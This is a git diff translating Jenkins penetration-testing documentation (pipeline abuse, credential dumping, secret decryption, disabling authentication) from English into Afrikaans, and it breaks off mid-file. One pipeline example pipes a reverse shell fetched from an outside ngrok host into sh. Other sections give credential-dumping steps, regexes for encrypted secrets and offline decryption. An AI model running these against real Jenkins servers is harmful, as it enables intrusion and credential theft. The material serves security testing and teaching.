-**Pipelines** can also be used as **build mechanism in projects**, in that case it can be configured a **file inside the repository** that will contains the pipeline syntax. By default `/Jenkinsfile` is used:
+**Pipelines** kan ook as **bou meganisme in projekte** gebruik word, in daardie geval kan dit geconfigureer word met 'n **lêer binne die repository** wat die pipeline sintaksis sal bevat. Standaard word `/Jenkinsfile` gebruik:
 
 ![](<../../images/image (127).png>)
 
-It's also possible to **store pipeline configuration files in other places** (in other repositories for example) with the goal of **separating** the repository **access** and the pipeline access.
+Dit is ook moontlik om **pipeline konfigurasielêers in ander plekke** te stoor (in ander repositories byvoorbeeld) met die doel om **toegang** tot die repository en die pipeline toegang te **skei**.
 
-If an attacker have **write access over that file** he will be able to **modify** it and **potentially trigger** the pipeline without even having access to Jenkins.\
-It's possible that the attacker will need to **bypass some branch protections** (depending on the platform and the user privileges they could be bypassed or not).
+As 'n aanvaller **skrywe toegang oor daardie lêer het**, sal hy in staat wees om dit te **wysig** en **potensieel die pipeline te aktiveer** sonder om toegang tot Jenkins te hê.\
+Dit is moontlik dat die aanvaller sal moet **omseil sommige tak beskermings** (afhangende van die platform en die gebruiker bevoegdhede kan dit omseil of nie).
 
-The most common triggers to execute a custom pipeline are:
+Die mees algemene triggers om 'n pasgemaakte pipeline uit te voer is:
 
-- **Pull request** to the main branch (or potentially to other branches)
-- **Push to the main branch** (or potentially to other branches)
-- **Update the main branch** and wait until it's executed somehow
+- **Trekversoek** na die hoof tak (of potensieel na ander takke)
+- **Stoot na die hoof tak** (of potensieel na ander takke)
+- **Opdateer die hoof tak** en wag totdat dit op een of ander manier uitgevoer word
 
 > [!NOTE]
-> If you are an **external user** you shouldn't expect to create a **PR to the main branch** of the repo of **other user/organization** and **trigger the pipeline**... but if it's **bad configured** you could fully **compromise companies just by exploiting this**.
+> As jy 'n **eksterne gebruiker** is, moet jy nie verwag om 'n **PR na die hoof tak** van die repo van **ander gebruiker/organisasie** te skep en **die pipeline te aktiveer** nie... maar as dit **sleg geconfigureer** is, kan jy heeltemal **maatskappye kompromitteer net deur dit te ontgin**.
 
 ### Pipeline RCE
 
-In the previous RCE section it was already indicated a technique to [**get RCE modifying a pipeline**](./#rce-creating-modifying-pipeline).
+In die vorige RCE afdeling is daar reeds 'n tegniek aangedui om [**RCE te verkry deur 'n pipeline te wysig**](./#rce-creating-modifying-pipeline).
 
-### Checking Env variables
-
-It's possible to declare **clear text env variables** for the whole pipeline or for specific stages. This env variables **shouldn't contain sensitive info**, but and attacker could always **check all the pipeline** configurations/Jenkinsfiles:
+### Kontroleer Omgewing veranderlikes
 
+Dit is moontlik om **duidelike teks omgewing veranderlikes** vir die hele pipeline of vir spesifieke fases te verklaar. Hierdie omgewing veranderlikes **moet nie sensitiewe inligting bevat nie**, maar 'n aanvaller kan altyd **alle pipeline** konfigurasies/Jenkinsfiles nagaan:
 ```bash
 pipeline {
-    agent {label 'built-in'}
-    environment {
-        GENERIC_ENV_VAR = "Test pipeline ENV variables."
-    }
+agent {label 'built-in'}
+environment {
+GENERIC_ENV_VAR = "Test pipeline ENV variables."
+}
 
-    stages {
-        stage("Build") {
-                environment {
-                    STAGE_ENV_VAR = "Test stage ENV variables."
-                }
-                steps {
+stages {
+stage("Build") {
+environment {
+STAGE_ENV_VAR = "Test stage ENV variables."
+}
+steps {
 ```
-
 ### Dumping secrets
 
-For information about how are secrets usually treated by Jenkins check out the basic information:
+Vir inligting oor hoe sekrete gewoonlik deur Jenkins hanteer word, kyk na die basiese inligting:
 
 {{#ref}}
 basic-jenkins-information.md
 {{#endref}}
 
-Credentials can be **scoped to global providers** (`/credentials/`) or to **specific projects** (`/job/<project-name>/configure`). Therefore, in order to exfiltrate all of them you need to **compromise at least all the projects** that contains secrets and execute custom/poisoned pipelines.
-
-There is another problem, in order to get a **secret inside the env** of a pipeline you need to **know the name and type of the secret**. For example, you try lo **load** a **`usernamePassword`** **secret** as a **`string`** **secret** you will get this **error**:
+Geloofsbriewe kan **geskik word aan globale verskaffers** (`/credentials/`) of aan **spesifieke projekte** (`/job/<project-name>/configure`). Daarom, om al hierdie te exfiltrate, moet jy **ten minste al die projekte** wat sekrete bevat, **kompromitteer** en pasgemaakte/vergiftigde pyplyne uitvoer.
 
+Daar is 'n ander probleem, om 'n **geheim binne die omgewing** van 'n pyplyn te kry, moet jy **die naam en tipe van die geheim** **ken**. Byvoorbeeld, as jy probeer om 'n **`usernamePassword`** **geheim** as 'n **`string`** **geheim** te **laai**, sal jy hierdie **fout** kry:
 ```
 ERROR: Credentials 'flag2' is of type 'Username with password' where 'org.jenkinsci.plugins.plaincredentials.StringCredentials' was expected
 ```
-
-Here you have the way to load some common secret types:
-
+Hier is die manier om 'n paar algemene geheime tipes te laai:
 ```bash
 withCredentials([usernamePassword(credentialsId: 'flag2', usernameVariable: 'USERNAME', passwordVariable: 'PASS')]) {
-    sh '''
-        env #Search for USERNAME and PASS
-    '''
+sh '''
+env #Search for USERNAME and PASS
+'''
 }
 
 withCredentials([string(credentialsId: 'flag1', variable: 'SECRET')]) {
-    sh '''
-        env #Search for SECRET
-    '''
+sh '''
+env #Search for SECRET
+'''
 }
 
 withCredentials([usernameColonPassword(credentialsId: 'mylogin', variable: 'USERPASS')]) {
-    sh '''
-        env # Search for USERPASS
-    '''
+sh '''
+env # Search for USERPASS
+'''
 }
 
 # You can also load multiple env variables at once
 withCredentials([usernamePassword(credentialsId: 'amazon', usernameVariable: 'USERNAME', passwordVariable: 'PASSWORD'),
-                 string(credentialsId: 'slack-url',variable: 'SLACK_URL'),]) {
-     sh '''
-        env
-    '''
+string(credentialsId: 'slack-url',variable: 'SLACK_URL'),]) {
+sh '''
+env
+'''
 }
 ```
-
-At the end of this page you can **find all the credential types**: [https://www.jenkins.io/doc/pipeline/steps/credentials-binding/](https://www.jenkins.io/doc/pipeline/steps/credentials-binding/)
+Aan die einde van hierdie bladsy kan jy **alle tipe geloofsbewyse** **vind**: [https://www.jenkins.io/doc/pipeline/steps/credentials-binding/](https://www.jenkins.io/doc/pipeline/steps/credentials-binding/)
 
 > [!WARNING]
-> The best way to **dump all the secrets at once** is by **compromising** the **Jenkins** machine (running a reverse shell in the **built-in node** for example) and then **leaking** the **master keys** and the **encrypted secrets** and decrypting them offline.\
-> More on how to do this in the [Nodes & Agents section](./#nodes-and-agents) and in the [Post Exploitation section](./#post-exploitation).
+> Die beste manier om **alle die geheime op een slag** te **dump** is deur die **Jenkins** masjien te **kompromitteer** (byvoorbeeld deur 'n omgekeerde skulp in die **ingeboude node** te laat loop) en dan die **master sleutels** en die **geënkripteerde geheime** te **lek** en dit offline te ontsleutel.\
+> Meer oor hoe om dit te doen in die [Nodes & Agents section](./#nodes-and-agents) en in die [Post Exploitation section](./#post-exploitation).
 
 ### Triggers
 
-From [the docs](https://www.jenkins.io/doc/book/pipeline/syntax/#triggers): The `triggers` directive defines the **automated ways in which the Pipeline should be re-triggered**. For Pipelines which are integrated with a source such as GitHub or BitBucket, `triggers` may not be necessary as webhooks-based integration will likely already be present. The triggers currently available are `cron`, `pollSCM` and `upstream`.
-
-Cron example:
+Van [die dokumentasie](https://www.jenkins.io/doc/book/pipeline/syntax/#triggers): Die `triggers` riglyn definieer die **geoutomatiseerde maniere waarop die Pipeline weer geaktiveer moet word**. Vir Pipelines wat geïntegreer is met 'n bron soos GitHub of BitBucket, mag `triggers` nie nodig wees nie, aangesien webhooks-gebaseerde integrasie waarskynlik reeds teenwoordig sal wees. Die huidige beskikbare triggers is `cron`, `pollSCM` en `upstream`.
 
+Cron voorbeeld:
 ```bash
 triggers { cron('H */4 * * 1-5') }
 ```
+Kontroleer **ander voorbeelde in die dokumentasie**.
 
-Check **other examples in the docs**.
+### Knoop & Agente
 
-### Nodes & Agents
+'n **Jenkins-instansie** mag **verskillende agente op verskillende masjiene hê**. Vanuit 'n aanvaller se perspektief beteken toegang tot verskillende masjiene **verskillende potensiële wolkakkredite** om te steel of **verskillende netwerktoegang** wat misbruik kan word om ander masjiene te ontgin.
 
-A **Jenkins instance** might have **different agents running in different machines**. From an attacker perspective, access to different machines means **different potential cloud credentials** to steal or **different network access** that could be abuse to exploit other machines.
-
-For more information check the basic information:
+Vir meer inligting, kyk na die basiese inligting:
 
 {{#ref}}
 basic-jenkins-information.md
 {{#endref}}
 
-You can enumerate the **configured nodes** in `/computer/`, you will usually find the \*\*`Built-In Node` \*\* (which is the node running Jenkins) and potentially more:
+Jy kan die **gekonfigureerde knope** in `/computer/` opnoem, jy sal gewoonlik die \*\*`Built-In Node` \*\* (wat die knoop is wat Jenkins uitvoer) en moontlik meer vind:
 
 ![](<../../images/image (249).png>)
 
-It is **specially interesting to compromise the Built-In node** because it contains sensitive Jenkins information.
-
-To indicate you want to **run** the **pipeline** in the **built-in Jenkins node** you can specify inside the pipeline the following config:
+Dit is **spesiaal interessant om die Built-In knoop te kompromitteer** omdat dit sensitiewe Jenkins-inligting bevat.
 
+Om aan te dui dat jy die **pipeline** in die **ingeboude Jenkins-knoop** wil **uitvoer**, kan jy die volgende konfigurasie binne die pipeline spesifiseer:
 ```bash
 pipeline {
-    agent {label 'built-in'}
+agent {label 'built-in'}
 ```
+### Volledige voorbeeld
 
-### Complete example
-
-Pipeline in an specific agent, with a cron trigger, with pipeline and stage env variables, loading 2 variables in a step and sending a reverse shell:
-
+Pypeline in 'n spesifieke agent, met 'n cron-trig, met pypeline en fase omgewingsveranderlikes, wat 2 veranderlikes in 'n stap laai en 'n omgekeerde shell stuur:
 ```bash
 pipeline {
-    agent {label 'built-in'}
-    triggers { cron('H */4 * * 1-5') }
-    environment {
-        GENERIC_ENV_VAR = "Test pipeline ENV variables."
-    }
+agent {label 'built-in'}
+triggers { cron('H */4 * * 1-5') }
+environment {
+GENERIC_ENV_VAR = "Test pipeline ENV variables."
+}
 
-    stages {
-        stage("Build") {
-                environment {
-                    STAGE_ENV_VAR = "Test stage ENV variables."
-                }
-                steps {
-            withCredentials([usernamePassword(credentialsId: 'amazon', usernameVariable: 'USERNAME', passwordVariable: 'PASSWORD'),
-                     string(credentialsId: 'slack-url',variable: 'SLACK_URL'),]) {
-                sh '''
-                    curl https://reverse-shell.sh/0.tcp.ngrok.io:16287 | sh PASS
-                '''
-            }
-        }
-    }
+stages {
+stage("Build") {
+environment {
+STAGE_ENV_VAR = "Test stage ENV variables."
+}
+steps {
+withCredentials([usernamePassword(credentialsId: 'amazon', usernameVariable: 'USERNAME', passwordVariable: 'PASSWORD'),
+string(credentialsId: 'slack-url',variable: 'SLACK_URL'),]) {
+sh '''
+curl https://reverse-shell.sh/0.tcp.ngrok.io:16287 | sh PASS
+'''
+}
+}
+}
 
-    post {
-        always {
-            cleanWs()
-        }
-    }
+post {
+always {
+cleanWs()
+}
+}
 }
 ```
-
-## Arbitrary File Read to RCE
+## Arbitraire Lêer Lees na RCE
 
 {{#ref}}
 jenkins-arbitrary-file-read-to-rce-via-remember-me.md
@@ -326,43 +306,40 @@ jenkins-rce-creating-modifying-project.md
 jenkins-rce-creating-modifying-pipeline.md
 {{#endref}}
 
-## Post Exploitation
+## Post Exploitatie
 
 ### Metasploit
-
 ```
 msf> post/multi/gather/jenkins_gather
 ```
+### Jenkins Geheime
 
-### Jenkins Secrets
+Jy kan die geheime lys deur toegang te verkry tot `/credentials/` as jy genoeg regte het. Let daarop dat dit slegs die geheime binne die `credentials.xml` lêer sal lys, maar **bou konfigurasielêers** mag ook **meer krediete** hê.
 
-You can list the secrets accessing `/credentials/` if you have enough permissions. Note that this will only list the secrets inside the `credentials.xml` file, but **build configuration files** might also have **more credentials**.
-
-If you can **see the configuration of each project**, you can also see in there the **names of the credentials (secrets)** being use to access the repository and **other credentials of the project**.
+As jy **die konfigurasie van elke projek kan sien**, kan jy ook daar die **name van die krediete (geheime)** sien wat gebruik word om toegang tot die repository te verkry en **ander krediete van die projek**.
 
 ![](<../../images/image (180).png>)
 
-#### From Groovy
+#### Van Groovy
 
 {{#ref}}
 jenkins-dumping-secrets-from-groovy.md
 {{#endref}}
 
-#### From disk
+#### Van skyf
 
-These files are needed to **decrypt Jenkins secrets**:
+Hierdie lêers is nodig om **Jenkins geheime te ontsleutel**:
 
 - secrets/master.key
 - secrets/hudson.util.Secret
 
-Such **secrets can usually be found in**:
+Sulke **geheime kan gewoonlik gevind word in**:
 
 - credentials.xml
 - jobs/.../build.xml
 - jobs/.../config.xml
 
-Here's a regex to find them:
-
+Hier is 'n regex om hulle te vind:
 ```bash
 # Find the secrets
 grep -re "^\s*<[a-zA-Z]*>{[a-zA-Z0-9=+/]*}<"
@@ -372,11 +349,9 @@ grep -lre "^\s*<[a-zA-Z]*>{[a-zA-Z0-9=+/]*}<"
 # Secret example
 credentials.xml: <secret>{AQAAABAAAAAwsSbQDNcKIRQMjEMYYJeSIxi2d3MHmsfW3d1Y52KMOmZ9tLYyOzTSvNoTXdvHpx/kkEbRZS9OYoqzGsIFXtg7cw==}</secret>
 ```
-
 #### Decrypt Jenkins secrets offline
 
-If you have dumped the **needed passwords to decrypt the secrets**, use [**this script**](https://github.com/gquere/pwn_jenkins/blob/master/offline_decryption/jenkins_offline_decrypt.py) **to decrypt those secrets**.
-
+As jy die **nodige wagwoorde om die geheime te ontsleutel** afgelaai het, gebruik [**hierdie skrif**](https://github.com/gquere/pwn_jenkins/blob/master/offline_decryption/jenkins_offline_decrypt.py) **om daardie geheime te ontsleutel**.
 ```bash
 python3 jenkins_offline_decrypt.py master.key hudson.util.Secret cred.xml
 06165DF2-C047-4402-8CAB-1C8EC526C115
@@ -384,23 +359,20 @@ python3 jenkins_offline_decrypt.py master.key hudson.util.Secret cred.xml
 b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn
 NhAAAAAwEAAQAAAYEAt985Hbb8KfIImS6dZlVG6swiotCiIlg/P7aME9PvZNUgg2Iyf2FT
 ```
-
-#### Decrypt Jenkins secrets from Groovy
-
+#### Ontsleutel Jenkins geheime vanaf Groovy
 ```bash
 println(hudson.util.Secret.decrypt("{...}"))
 ```
+### Skep nuwe admin gebruiker
 
-### Create new admin user
+1. Toegang die Jenkins config.xml lêer in `/var/lib/jenkins/config.xml` of `C:\Program Files (x86)\Jenkis\`
+2. Soek vir die woord `<useSecurity>true</useSecurity>` en verander die woord **`true`** na **`false`**.
+1. `sed -i -e 's/<useSecurity>true</<useSecurity>false</g' config.xml`
+3. **Herstart** die **Jenkins** bediener: `service jenkins restart`
+4. Gaan nou weer na die Jenkins portaal en **Jenkins sal nie enige geloofsbriewe vra** hierdie keer nie. Jy navigeer na "**Manage Jenkins**" om die **administrateur wagwoord weer** in te stel.
+5. **Aktiveer** die **sekuriteit** weer deur die instellings te verander na `<useSecurity>true</useSecurity>` en **herstart die Jenkins weer**.
 
-1. Access the Jenkins config.xml file in `/var/lib/jenkins/config.xml` or `C:\Program Files (x86)\Jenkis\`
-2. Search for the word `<useSecurity>true</useSecurity>`and change the word \*\*`true` \*\* to **`false`**.
-   1. `sed -i -e 's/<useSecurity>true</<useSecurity>false</g' config.xml`
-3. **Restart** the **Jenkins** server: `service jenkins restart`
-4. Now go to the Jenkins portal again and **Jenkins will not ask any credentials** this time. You navigate to "**Manage Jenkins**" to set the **administrator password again**.
-5. **Enable** the **security** again by changing settings to `<useSecurity>true</useSecurity>` and **restart the Jenkins again**.
-
-## References
+## Verwysings
 
 - [https://github.com/gquere/pwn_jenkins](https://github.com/gquere/pwn_jenkins)
 - [https://leonjza.github.io/blog/2015/05/27/jenkins-to-meterpreter---toying-with-powersploit/](https://leonjza.github.io/blog/2015/05/27/jenkins-to-meterpreter---toying-with-powersploit/)
@@ -410,7 +382,3 @@ println(hudson.util.Secret.decrypt("{...}"))
 - [https://medium.com/@Proclus/tryhackme-internal-walk-through-90ec901926d3](https://medium.com/@Proclus/tryhackme-internal-walk-through-90ec901926d3)
 
 {{#include ../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-ci-cd/jenkins-security/basic-jenkins-information.md b/src/pentesting-ci-cd/jenkins-security/basic-jenkins-information.md
index 6e62a8536..944235eaf 100644
--- a/src/pentesting-ci-cd/jenkins-security/basic-jenkins-information.md
+++ b/src/pentesting-ci-cd/jenkins-security/basic-jenkins-information.md
@@ -6,48 +6,48 @@
 
 ### Username + Password
 
-The most common way to login in Jenkins if with a username or a password
+Die mees algemene manier om in te log in Jenkins is met 'n gebruikersnaam of 'n wagwoord.
 
 ### Cookie
 
-If an **authorized cookie gets stolen**, it ca be used to access the session of the user. The cookie is usually called `JSESSIONID.*`. (A user can terminate all his sessions, but he would need to find out first that a cookie was stolen).
+As 'n **geautoriseerde koekie gesteel word**, kan dit gebruik word om toegang te verkry tot die gebruiker se sessie. Die koekie word gewoonlik `JSESSIONID.*` genoem. (‘n Gebruiker kan al sy sessies beëindig, maar hy moet eers uitvind dat 'n koekie gesteel is).
 
 ### SSO/Plugins
 
-Jenkins can be configured using plugins to be **accessible via third party SSO**.
+Jenkins kan geconfigureer word met behulp van plugins om **toeganklik te wees via derdeparty SSO**.
 
 ### Tokens
 
-**Users can generate tokens** to give access to applications to impersonate them via CLI or REST API.
+**Gebruikers kan tokens genereer** om toegang te gee aan toepassings om hulle via CLI of REST API na te boots.
 
 ### SSH Keys
 
-This component provides a built-in SSH server for Jenkins. It’s an alternative interface for the [Jenkins CLI](https://www.jenkins.io/doc/book/managing/cli/), and commands can be invoked this way using any SSH client. (From the [docs](https://plugins.jenkins.io/sshd/))
+Hierdie komponent bied 'n ingeboude SSH-bediener vir Jenkins. Dit is 'n alternatiewe koppelvlak vir die [Jenkins CLI](https://www.jenkins.io/doc/book/managing/cli/), en opdragte kan op hierdie manier met enige SSH-kliënt aangeroep word. (Van die [docs](https://plugins.jenkins.io/sshd/))
 
 ## Authorization
 
-In `/configureSecurity` it's possible to **configure the authorization method of Jenkins**. There are several options:
+In `/configureSecurity` is dit moontlik om die **autorisasiemetode van Jenkins te configureer**. Daar is verskeie opsies:
 
-- **Anyone can do anything**: Even anonymous access can administrate the server
-- **Legacy mode**: Same as Jenkins <1.164. If you have the **"admin" role**, you'll be granted **full control** over the system, and **otherwise** (including **anonymous** users) you'll have **read** access.
-- **Logged-in users can do anything**: In this mode, every **logged-in user gets full control** of Jenkins. The only user who won't have full control is **anonymous user**, who only gets **read access**.
-- **Matrix-based security**: You can configure **who can do what** in a table. Each **column** represents a **permission**. Each **row** **represents** a **user or a group/role.** This includes a special user '**anonymous**', which represents **unauthenticated users**, as well as '**authenticated**', which represents **all authenticated users**.
+- **Enigeen kan enigiets doen**: Selfs anonieme toegang kan die bediener administreer.
+- **Legacy mode**: Dieselfde as Jenkins <1.164. As jy die **"admin" rol** het, sal jy **volledige beheer** oor die stelsel ontvang, en **andersins** (insluitend **anonieme** gebruikers) sal jy **lees** toegang hê.
+- **Aangemelde gebruikers kan enigiets doen**: In hierdie modus, elke **aangemelde gebruiker kry volledige beheer** van Jenkins. Die enigste gebruiker wat nie volledige beheer sal hê nie, is die **anonieme gebruiker**, wat net **lees toegang** kry.
+- **Matrix-gebaseerde sekuriteit**: Jy kan **wie wat kan doen** in 'n tabel configureer. Elke **kolom** verteenwoordig 'n **toestemming**. Elke **ry** **verteenwoordig** 'n **gebruiker of 'n groep/rol.** Dit sluit 'n spesiale gebruiker '**anoniem**' in, wat **ongemagtigde gebruikers** verteenwoordig, sowel as '**geverifieerde**', wat **alle geverifieerde gebruikers** verteenwoordig.
 
 ![](<../../images/image (149).png>)
 
-- **Project-based Matrix Authorization Strategy:** This mode is an **extension** to "**Matrix-based security**" that allows additional ACL matrix to be **defined for each project separately.**
-- **Role-Based Strategy:** Enables defining authorizations using a **role-based strategy**. Manage the roles in `/role-strategy`.
+- **Projek-gebaseerde Matrix Autorisasiestrategie:** Hierdie modus is 'n **uitbreiding** van "**Matrix-gebaseerde sekuriteit**" wat toelaat dat addisionele ACL-matrix **vir elke projek apart gedefinieer word.**
+- **Rol-gebaseerde Strategie:** Maak dit moontlik om autorisasies te definieer met 'n **rol-gebaseerde strategie**. Bestuur die rolle in `/role-strategy`.
 
 ## **Security Realm**
 
-In `/configureSecurity` it's possible to **configure the security realm.** By default Jenkins includes support for a few different Security Realms:
+In `/configureSecurity` is dit moontlik om die **sekuriteitsgebied te configureer.** Standaard sluit Jenkins ondersteuning in vir 'n paar verskillende Sekuriteitsgebiede:
 
-- **Delegate to servlet container**: For **delegating authentication a servlet container running the Jenkins controller**, such as [Jetty](https://www.eclipse.org/jetty/).
-- **Jenkins’ own user database:** Use **Jenkins’s own built-in user data store** for authentication instead of delegating to an external system. This is enabled by default.
-- **LDAP**: Delegate all authentication to a configured LDAP server, including both users and groups.
-- **Unix user/group database**: **Delegates the authentication to the underlying Unix** OS-level user database on the Jenkins controller. This mode will also allow re-use of Unix groups for authorization.
+- **Delegeer aan servlet-container**: Vir **delegasie van autentisering aan 'n servlet-container wat die Jenkins-beheerder uitvoer**, soos [Jetty](https://www.eclipse.org/jetty/).
+- **Jenkins se eie gebruikersdatabasis:** Gebruik **Jenkins se eie ingeboude gebruikersdatastoor** vir autentisering in plaas van om aan 'n eksterne stelsel te delegeer. Dit is standaard geaktiveer.
+- **LDAP**: Delegeer alle autentisering aan 'n geconfigureerde LDAP-bediener, insluitend beide gebruikers en groepe.
+- **Unix gebruikers/groep databasis**: **Delegeer die autentisering aan die onderliggende Unix** OS-vlak gebruikersdatabasis op die Jenkins-beheerder. Hierdie modus sal ook die hergebruik van Unix-groepe vir autorisasie toelaat.
 
-Plugins can provide additional security realms which may be useful for incorporating Jenkins into existing identity systems, such as:
+Plugins kan addisionele sekuriteitsgebiede bied wat nuttig kan wees om Jenkins in bestaande identiteitsisteme in te sluit, soos:
 
 - [Active Directory](https://plugins.jenkins.io/active-directory)
 - [GitHub Authentication](https://plugins.jenkins.io/github-oauth)
@@ -55,31 +55,31 @@ Plugins can provide additional security realms which may be useful for incorpora
 
 ## Jenkins Nodes, Agents & Executors
 
-Definitions from the [docs](https://www.jenkins.io/doc/book/managing/nodes/):
+Definisies van die [docs](https://www.jenkins.io/doc/book/managing/nodes/):
 
-**Nodes** are the **machines** on which build **agents run**. Jenkins monitors each attached node for disk space, free temp space, free swap, clock time/sync and response time. A node is taken offline if any of these values go outside the configured threshold.
+**Nodes** is die **masjiene** waarop bou **agents werk**. Jenkins monitor elke aangehegte node vir skyfspasie, vrye tydelike ruimte, vrye swap, klok tyd/sink en reaksietyd. 'n Node word vanlyn geneem as enige van hierdie waardes buite die geconfigureerde drempel gaan.
 
-**Agents** **manage** the **task execution** on behalf of the Jenkins controller by **using executors**. An agent can use any operating system that supports Java. Tools required for builds and tests are installed on the node where the agent runs; they can **be installed directly or in a container** (Docker or Kubernetes). Each **agent is effectively a process with its own PID** on the host machine.
+**Agents** **bestuur** die **taakuitvoering** namens die Jenkins-beheerder deur **executors** te gebruik. 'n Agent kan enige bedryfstelsel gebruik wat Java ondersteun. Gereedskap wat benodig word vir bou en toetse word op die node geïnstalleer waar die agent loop; hulle kan **direk of in 'n houer** (Docker of Kubernetes) geïnstalleer word. Elke **agent is effektief 'n proses met sy eie PID** op die gasheer masjien.
 
-An **executor** is a **slot for execution of tasks**; effectively, it is **a thread in the agent**. The **number of executors** on a node defines the number of **concurrent tasks** that can be executed on that node at one time. In other words, this determines the **number of concurrent Pipeline `stages`** that can execute on that node at one time.
+'n **executor** is 'n **gleuf vir die uitvoering van take**; effektief, dit is **'n draad in die agent**. Die **aantal executors** op 'n node definieer die aantal **gelyktydige take** wat op daardie node op 'n slag uitgevoer kan word. Met ander woorde, dit bepaal die **aantal gelyktydige Pipeline `stages`** wat op daardie node op 'n slag kan uitvoer.
 
 ## Jenkins Secrets
 
 ### Encryption of Secrets and Credentials
 
-Definition from the [docs](https://www.jenkins.io/doc/developer/security/secrets/#encryption-of-secrets-and-credentials): Jenkins uses **AES to encrypt and protect secrets**, credentials, and their respective encryption keys. These encryption keys are stored in `$JENKINS_HOME/secrets/` along with the master key used to protect said keys. This directory should be configured so that only the operating system user the Jenkins controller is running as has read and write access to this directory (i.e., a `chmod` value of `0700` or using appropriate file attributes). The **master key** (sometimes referred to as a "key encryption key" in cryptojargon) is **stored \_unencrypted**\_ on the Jenkins controller filesystem in **`$JENKINS_HOME/secrets/master.key`** which does not protect against attackers with direct access to that file. Most users and developers will use these encryption keys indirectly via either the [Secret](https://javadoc.jenkins.io/byShortName/Secret) API for encrypting generic secret data or through the credentials API. For the cryptocurious, Jenkins uses AES in cipher block chaining (CBC) mode with PKCS#5 padding and random IVs to encrypt instances of [CryptoConfidentialKey](https://javadoc.jenkins.io/byShortName/CryptoConfidentialKey) which are stored in `$JENKINS_HOME/secrets/` with a filename corresponding to their `CryptoConfidentialKey` id. Common key ids include:
+Definisie van die [docs](https://www.jenkins.io/doc/developer/security/secrets/#encryption-of-secrets-and-credentials): Jenkins gebruik **AES om geheime**, kredensiale, en hul onderskeie versleuteling sleutels te versleutel en te beskerm. Hierdie versleuteling sleutels word gestoor in `$JENKINS_HOME/secrets/` saam met die meester sleutel wat gebruik word om genoemde sleutels te beskerm. Hierdie gids moet geconfigureer word sodat slegs die bedryfstelsel gebruiker wat die Jenkins-beheerder uitvoer, lees- en skrywe toegang tot hierdie gids het (d.w.s. 'n `chmod` waarde van `0700` of deur toepaslike lêer eienskappe te gebruik). Die **meester sleutel** (soms verwys as 'n "sleutel versleuteling sleutel" in cryptojargon) is **gestoor \_onversleuteld\_** op die Jenkins-beheerder lêerstelsel in **`$JENKINS_HOME/secrets/master.key`** wat nie teen aanvallers met direkte toegang tot daardie lêer beskerm nie. Meeste gebruikers en ontwikkelaars sal hierdie versleuteling sleutels indirek gebruik via óf die [Secret](https://javadoc.jenkins.io/byShortName/Secret) API vir die versleuteling van generiese geheime data of deur die kredensiale API. Vir die cryptocurious, gebruik Jenkins AES in cipher block chaining (CBC) modus met PKCS#5 padding en random IVs om voorbeelde van [CryptoConfidentialKey](https://javadoc.jenkins.io/byShortName/CryptoConfidentialKey) te versleutel wat gestoor word in `$JENKINS_HOME/secrets/` met 'n lêernaam wat ooreenstem met hul `CryptoConfidentialKey` id. Algemene sleutel id's sluit in:
 
-- `hudson.util.Secret`: used for generic secrets;
-- `com.cloudbees.plugins.credentials.SecretBytes.KEY`: used for some credentials types;
-- `jenkins.model.Jenkins.crumbSalt`: used by the [CSRF protection mechanism](https://www.jenkins.io/doc/book/managing/security/#cross-site-request-forgery); and
+- `hudson.util.Secret`: gebruik vir generiese geheime;
+- `com.cloudbees.plugins.credentials.SecretBytes.KEY`: gebruik vir sommige kredensiale tipes;
+- `jenkins.model.Jenkins.crumbSalt`: gebruik deur die [CSRF beskermingsmeganisme](https://www.jenkins.io/doc/book/managing/security/#cross-site-request-forgery); en
 
 ### Credentials Access
 
-Credentials can be **scoped to global providers** (`/credentials/`) that can be accessed by any project configured, or can be scoped to **specific projects** (`/job/<project-name>/configure`) and therefore only accessible from the specific project.
+Kredensiale kan **geskik word vir globale verskaffers** (`/credentials/`) wat deur enige geconfigureerde projek toegang verkry kan word, of kan geskik word vir **spesifieke projekte** (`/job/<project-name>/configure`) en dus slegs vanaf die spesifieke projek toeganklik wees.
 
-According to [**the docs**](https://www.jenkins.io/blog/2019/02/21/credentials-masking/): Credentials that are in scope are made available to the pipeline without limitation. To **prevent accidental exposure in the build log**, credentials are **masked** from regular output, so an invocation of `env` (Linux) or `set` (Windows), or programs printing their environment or parameters would **not reveal them in the build log** to users who would not otherwise have access to the credentials.
+Volgens [**die docs**](https://www.jenkins.io/blog/2019/02/21/credentials-masking/): Kredensiale wat in die omvang is, word sonder beperking aan die pyplyn beskikbaar gestel. Om **per ongeluk blootstelling in die boulog te voorkom**, word kredensiale **gemasker** van gewone uitvoer, so 'n aanroep van `env` (Linux) of `set` (Windows), of programme wat hul omgewing of parameters druk, sou **nie hulle in die boulog onthul nie** aan gebruikers wat andersins nie toegang tot die kredensiale sou hê nie.
 
-**That is why in order to exfiltrate the credentials an attacker needs to, for example, base64 them.**
+**Dit is waarom 'n aanvaller, om die kredensiale te ontvoer, byvoorbeeld, hulle in base64 moet kodifiseer.**
 
 ## References
 
@@ -92,7 +92,3 @@ According to [**the docs**](https://www.jenkins.io/blog/2019/02/21/credentials-m
 - [https://www.jenkins.io/doc/book/managing/nodes/](https://www.jenkins.io/doc/book/managing/nodes/)
 
 {{#include ../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-ci-cd/jenkins-security/jenkins-arbitrary-file-read-to-rce-via-remember-me.md b/src/pentesting-ci-cd/jenkins-security/jenkins-arbitrary-file-read-to-rce-via-remember-me.md
index 9d2b232e1..3a50c496d 100644
--- a/src/pentesting-ci-cd/jenkins-security/jenkins-arbitrary-file-read-to-rce-via-remember-me.md
+++ b/src/pentesting-ci-cd/jenkins-security/jenkins-arbitrary-file-read-to-rce-via-remember-me.md
@@ -2,108 +2,104 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-In this blog post is possible to find a great way to transform a Local File Inclusion vulnerability in Jenkins into RCE: [https://blog.securelayer7.net/spring-cloud-skipper-vulnerability/](https://blog.securelayer7.net/spring-cloud-skipper-vulnerability/)
+In hierdie blogpos is dit moontlik om 'n uitstekende manier te vind om 'n Local File Inclusion kwesbaarheid in Jenkins in RCE te transformeer: [https://blog.securelayer7.net/spring-cloud-skipper-vulnerability/](https://blog.securelayer7.net/spring-cloud-skipper-vulnerability/)
 
-This is an AI created summary of the part of the post were the creaft of an arbitrary cookie is abused to get RCE abusing a local file read until I have time to create a summary on my own:
